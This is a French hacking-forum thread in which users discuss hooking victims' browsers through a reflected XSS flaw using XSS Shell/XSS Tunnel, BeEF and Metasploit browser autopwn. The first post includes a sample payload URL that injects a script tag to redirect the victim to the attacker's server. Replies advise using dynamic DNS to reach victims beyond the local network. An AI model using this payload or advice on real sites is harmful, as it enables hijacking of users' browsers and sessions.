Annonce

Réduire
Aucune annonce.

XSS Shell - XSS Tunnel

Réduire
X
 
  • Filtre
  • Heure
  • Afficher
Tout nettoyer
nouveaux messages

  • XSS Shell - XSS Tunnel

    Bonsoir à tous ! Ça fait un moment que je traine ici et je n'ai encore jamais rien posté, rien à dire d'intéressant qui n'est pas déjà été dit surement...
    Alors j'ai découvert une utilisation assez surprenante des failles XSS (reflected pour ce cas), ça existe depuis quelques années mais je n'en avais jamais entendu parlé...
    Pour moi une faille XSS sert juste a afficher un vieux alert('coucou') dans le browser de la cible ou au pire le renvoyer vers un script php voleur de cookies, mais en fait, non...

    J'ai donc un ami blogueur qui a une faille xss dans son search.php (classique). En cherchant bien je suis tombé sur : XSS Shell



    On installe et configure XSS Shell (que l'on trouve ici : https://github.com/portcullislabs/xssshell-xsstunnell)

    C'est du .asp donc hosting sur IIS.

    Une fois configuré, on envoi l'url à la victime (exemple : http://sitevulnerable.com/search.php?=<script>document.location='http://monserveur.com'</script>

    La cible est donc connecté a xssshell et on peut lui envoyer tout un tas de requêtes prédéfinies ou tout ce qu'on veut du moment que ça soit en JavaScript.

    Le seul problême c'est que quand la cible quitte son browser ou ferme l'onglet, la connexion est perdue.

    C'est la qu'entre en jeu XSS Tunnel :



    Ce petit soft se connecte au serveur et utilise la cible comme proxy, la connexion est maintenue même si la cible change de domaine

    J'en suis encore à essayer de faire fonctionner XSS Tunnel, je n'apparait pas en tant que client, je pige pas trop pourquoi, bref...

    En tout cas c'est vraiment très intéressant, si quelqu'un a déjà utiliser cette "technique" ou s'y connait un peu ça m’intéresserais d'avoir quelques retours ou avis ^^

    Bonne soirée !
    Dernière modification par Yxogen, 02 mai 2015, 22h56.

  • #2
    Hello

    Pour le début du sujet, c'est exactement le même principe que le framework BeEF (que j'ai déjà utilisé chez moi en local et qui est très intéressant)
    Après je pense que pour rendre ton attaque plus puissante tu peux rediriger ton localhost sur un DNS No-IP par exemple (ou DynDNS), qui te permettrai d'infecter des personnes qui ne sont pas forcement présente sur ton réseau local

    En ce qui concerne cette partie du sujet:

    Envoyé par Yxogen Voir le message
    Ce petit soft se connecte au serveur et utilise la cible comme proxy, la connexion est maintenue même si la cible change de domaine
    ça m'étonnais, donc j'ai essayé aussi , résultat des courses : ça ne fonctionne pas non plus chez moi

    Bon sujet bien écrit tout de même alors je lâche mon j'aime

    Commentaire


    • #3
      Simpas comme tools je vais DL ca pour voir, Comme la dit 0xw33p sous kali il y a Beef-xss qui est quand méme trés puissant, et qui a l'avantage de pouvoir étre "coupler" avec Metasploit, dont entre autres, le module "Browser-auto-pwn" qui permet d'exploiter une vuln potentiel dans le navigateur ce qui remplace en gros ton xss-tunel.. a tester vraiment !

      Et si non dans le méme genre il y a egalement xssf qui lui peu permetre de crée un "minibotnet" avec tout les zombie infecter via une xss stored.. mais je crois qu'il n'est plus mis à jour :/
      "Please do not use in military or secret service, or for illegal purposes."

      Commentaire

      Chargement...
      X